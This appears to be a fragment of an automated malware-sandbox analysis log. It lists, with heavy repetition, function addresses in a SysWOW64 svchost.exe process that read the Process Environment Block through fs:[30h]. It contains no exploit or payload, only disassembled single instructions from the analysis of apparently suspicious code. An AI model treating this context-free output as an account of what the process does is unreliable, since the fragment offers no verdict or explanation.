Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h] 2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h] 2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h] 2_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h] 2_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h] 2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h] 2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h] 2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h] 2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h] 2_2_030C6500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] 2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] 2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] 2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] 2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] 2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h] 2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h] 2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h] 2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h] 2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h] 2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03032582 mov eax, dword ptr fs:[00000030h] 2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h] 2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03064588 mov eax, dword ptr fs:[00000030h] 2_2_03064588
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h] 2_2_0306E59C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h] 2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h] 2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h] 2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h] 2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h] 2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h] 2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h] 2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h] 2_2_030365D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h] 2_2_030325E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h] 2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h] 2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h] 2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h] 2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h] 2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h] 2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h] 2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h] 2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h] 2_2_0302C427
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h] 2_2_0306A430
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h] 2_2_030EA456
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302645D mov eax, dword ptr fs:[00000030h] 2_2_0302645D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305245A mov eax, dword ptr fs:[00000030h] 2_2_0305245A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h] 2_2_030BC460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h] 2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h] 2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h] 2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h] 2_2_030EA49A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030364AB mov eax, dword ptr fs:[00000030h] 2_2_030364AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h] 2_2_030644B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h] 2_2_030BA4B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h] 2_2_030304E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h] 2_2_03104B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h] 2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h] 2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h] 2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h] 2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h] 2_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h] 2_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h] 2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h] 2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h] 2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h] 2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h] 2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h] 2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h] 2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h] 2_2_030D8B42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028B50 mov eax, dword ptr fs:[00000030h] 2_2_03028B50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h] 2_2_030DEB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h] 2_2_0302CB7E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h] 2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h] 2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] 2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] 2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] 2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] 2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] 2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] 2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h] 2_2_030DEBD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] 2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] 2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] 2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h] 2_2_0305EBFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h] 2_2_030BCBF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h] 2_2_030BCA11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h] 2_2_0306CA24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h] 2_2_0305EA2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h] 2_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h] 2_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h] 2_2_0306CA38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h] 2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h] 2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] 2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] 2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] 2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h] 2_2_030DEA60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h] 2_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h] 2_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h] 2_2_03104A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h] 2_2_03068A90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h] 2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h] 2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h] 2_2_03086AA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] 2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] 2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] 2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h] 2_2_03030AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h] 2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h] 2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h] 2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h] 2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h] 2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h] 2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h] 2_2_030BC912
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h] 2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h] 2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h] 2_2_030B892A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h] 2_2_030C892B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h] 2_2_030B0946
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104940 mov eax, dword ptr fs:[00000030h] 2_2_03104940
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] 2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] 2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] 2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h] 2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h] 2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h] 2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h] 2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h] 2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h] 2_2_030BC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h] 2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h] 2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h] 2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h] 2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h] 2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h] 2_2_030C69C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
